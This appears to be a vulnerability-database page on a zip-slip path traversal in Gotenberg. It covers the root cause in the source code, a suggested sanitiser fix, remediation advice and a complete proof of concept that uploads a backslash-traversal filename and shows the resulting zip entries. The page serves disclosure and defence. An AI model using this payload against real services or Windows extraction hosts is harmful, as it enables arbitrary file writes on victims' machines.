Gotenberg CVE-2026-44829
HIGHSeverity by source
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
filepath.Base on the Linux container does not strip backslashes (\), because \ is only a path separator on Windows. A multipart filename like ..\..\..\..\Windows\System32\evil.pdf survives Gotenberg's input sanitisation and lands verbatim as the zip entry name when a multi-output route returns its result as a zip (e.g. /forms/pdfengines/split). Windows zip extractors interpret \ as a path separator and write the file outside the extraction directory.
Details
pkg/modules/api/context.go:434, 472:
filename := norm.NFC.String(filepath.Base(fh.Filename))On Linux, filepath.Base("..\\..\\..\\..\\Windows\\System32\\evil.pdf") returns the same string verbatim - there are no / separators to find. The original filename then flows to ctx.diskToOriginal (pkg/modules/api/context.go:459, 393) and through pkg/modules/pdfengines/routes.go:287-322 (SplitPdfStub), which builds:
originalNameNoExt := strings.TrimSuffix(originalName, filepath.Ext(originalName))
newOriginal := fmt.Sprintf("%s_%d.pdf", originalNameNoExt, i)
ctx.RegisterDiskPath(newPath, newOriginal)Finally pkg/modules/api/context.go:617-642 constructs the zip via archives.FilesFromDisk + archives.Zip{}.Archive. mholt/archives@v0.1.5/archives.go:155-184 (nameOnDiskToNameInArchive) returns path.Join(rootInArchive, "") - the map value verbatim.
Suggested fix
- filename := norm.NFC.String(filepath.Base(fh.Filename))
+ filename := sanitizeFilename(fh.Filename)
+
+ func sanitizeFilename(name string) string {
+ if i := strings.LastIndexAny(name, "/\\"); i >= 0 {
+ name = name[i+1:]
+ }
+ name = norm.NFC.String(name)
+ // Optional belt-and-braces:
+ name = strings.ReplaceAll(name, "..", "_")
+ name = strings.Map(func(r rune) rune {
+ if r < 0x20 || r == 0x7f { return -1 }
+ return r
+ }, name)
+ return name
+ }The same sanitiser closes Advisory 8.
PoC
Prerequisite: pip install requests. curl -F filename= mangles backslashes on some shells, so we use Python's requests to deliver the malicious filename byte-perfect.
mkdir -p /tmp/gotenberg-poc && cd /tmp/gotenberg-poc
docker rm -f gotenberg-audit 2>/dev/null
docker run -d --rm --name gotenberg-audit -p 3000:3000 gotenberg/gotenberg:8.32.0
i=0; until [ "$(curl -s -o /dev/null -w '%{http_code}' http://localhost:3000/health)" = "200" ] || [ $i -ge 30 ]; do i=$((i+1)); sleep 2; done
# Stub PDF.
printf '%%PDF-1.4\n1 0 obj<</Type/Catalog/Pages 2 0 R>>endobj\n2 0 obj<</Type/Pages/Kids[3 0 R]/Count 1>>endobj\n3 0 obj<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]>>endobj\nxref\n0 4\n0000000000 65535 f\n0000000010 00000 n\n0000000053 00000 n\n0000000100 00000 n\ntrailer<</Size 4/Root 1 0 R>>\nstartxref\n158\n%%%%EOF\n' > stub.pdf
# Step 1: produce a 2-page PDF so /split returns multiple entries.
curl -s -o two.pdf -X POST http://localhost:3000/forms/pdfengines/merge \
-F 'files=@stub.pdf;filename=a.pdf' \
-F 'files=@stub.pdf;filename=b.pdf'
# Step 2: split, declaring the multipart filename as a Windows path-traversal payload.
python3 - <<'PY'
import requests, zipfile, binascii
fname = '..\\..\\..\\..\\Windows\\System32\\evil.pdf'
files = {'files': (fname, open('two.pdf', 'rb'), 'application/pdf')}
data = {'splitMode': 'intervals', 'splitSpan': '1'}
r = requests.post('http://localhost:3000/forms/pdfengines/split', files=files, data=data)
print(f'HTTP={r.status_code} ctype={r.headers.get("content-type")} bytes={len(r.content)}')
open('split.zip', 'wb').write(r.content)
z = zipfile.ZipFile('split.zip')
print('--- zip entries (orig_filename) ---')
for info in z.infolist():
print(f' {info.orig_filename!r}')
# Show raw central-directory bytes to prove backslashes are on the wire:
data = open('split.zip', 'rb').read()
idx = data.find(b'PK\x01\x02')
print('--- raw central-dir hex around filename ---')
print(f' {binascii.hexlify(data[idx:idx+80]).decode()}')
PY
docker stop gotenberg-auditObserved output:
HTTP=200 ctype=application/zip bytes=24750
--- zip entries (orig_filename) ---
'..\\..\\..\\..\\Windows\\System32\\evil_0.pdf'
'..\\..\\..\\..\\Windows\\System32\\evil_1.pdf'
--- raw central-dir hex around filename ---
504b010214031400080800009a7da25c61b6fc178e2f00008e2f0000270009000000000000000000a481000000002e2e5c2e2e5c2e2e5c2e2e5c57696e646f77735c53797374656d33325c6576696c5fThe trailing hex 2e2e5c 2e2e5c 2e2e5c 2e2e5c 57696e646f7773 5c 53797374656d3332 5c 6576696c5f decodes to ..\..\..\..\Windows\System32\evil_. (Python's ZipFile.namelist() would normally hide this by displaying /, but info.orig_filename returns the literal backslash form.)
To see the Windows-side traversal effect on a Windows host, run:
Expand-Archive -Path .\split.zip -DestinationPath .\out -Force
Get-ChildItem .\out -Recurse
# → out\Windows\System32\evil_0.pdf
# → out\Windows\System32\evil_1.pdfPowerShell collapses the .. parents but creates the Windows\System32\ subdirectory tree. 7-Zip and WinRAR with default settings honor the .. parents and traverse out of the extraction directory entirely.
Impact
- Arbitrary file write on a Windows-side consumer that extracts the returned zip (Windows Explorer, 7-Zip, WinRAR, .NET
ZipFile.ExtractToDirectory). - Reachable via every multi-output Gotenberg route -
/forms/pdfengines/split,/forms/pdfengines/flatten//encrypt//embed//watermark//stamp//rotate(when called with multiple input PDFs),/forms/libreoffice/convertwith multiple inputs,/forms/pdfengines/convert. - Also reachable via
downloadFromupstreamContent-Disposition: filename="..\\..\\evil.exe"- the filename flows through the samectx.diskToOriginalmap atpkg/modules/api/context.go:354, 393.
AnalysisAI
Zip slip path traversal in Gotenberg through version 8.32.0 allows remote unauthenticated attackers to plant files outside the extraction directory on Windows hosts that unzip multi-output API responses. Because Gotenberg runs on Linux containers, its filepath.Base sanitisation never strips Windows-style backslashes from uploaded multipart filenames, so a crafted name like '..\..\..\Windows\System32\evil.pdf' is preserved verbatim as a zip entry name and honoured by Windows extractors (7-Zip, WinRAR, .NET ZipFile, Explorer). A working publicly available exploit code exists in the GHSA advisory; the issue is not present in CISA KEV and no EPSS score was provided.
Technical ContextAI
Gotenberg is a Go-based HTTP service (github.com/gotenberg/gotenberg/v8, pkg:go) that wraps Chromium, LibreOffice and PDF engines to convert documents. The root cause is a classic CWE-22 path traversal arising from a host/target OS mismatch: in pkg/modules/api/context.go (lines 434 and 472) the handler calls filepath.Base(fh.Filename), but Go's filepath package on Linux only treats '/' as a separator, leaving backslash sequences untouched. The unsanitised name flows through ctx.diskToOriginal and SplitPdfStub into the mholt/archives v0.1.5 library, whose nameOnDiskToNameInArchive writes the supplied map value verbatim into the zip central directory. The same diskToOriginal map is also reachable through the downloadFrom Content-Disposition filename parameter, broadening the input surface beyond direct multipart uploads.
RemediationAI
Vendor-released patch: upgrade to Gotenberg v8.33.0 or later, whose release notes (https://github.com/gotenberg/gotenberg/releases/tag/v8.33.0) explicitly add stripping of both forward-slash and backslash path separators from caller-supplied Gotenberg-Output-Filename headers and multipart filename fields. If immediate upgrade is not possible, sanitise filenames at an upstream proxy by rejecting or rewriting any multipart filename or Content-Disposition parameter containing '\' or '..' before the request reaches Gotenberg (this may break legitimate Windows clients that submit native paths). As an additional defensive layer, change downstream consumers to extract Gotenberg zip output with tooling that normalises backslashes and rejects '..' segments - for example, validate each zip entry name with a path-canonicalisation step in the consuming pipeline - rather than feeding the archive straight into 7-Zip/WinRAR/ZipFile.ExtractToDirectory; the trade-off is added latency and code in every consumer. Disabling the multi-output routes (/forms/pdfengines/split and similar) and the downloadFrom feature eliminates exposure but removes core product functionality.
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Same weakness CWE-22 – Path Traversal
View allSame technique Path Traversal
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-hwc4-gmrw-5222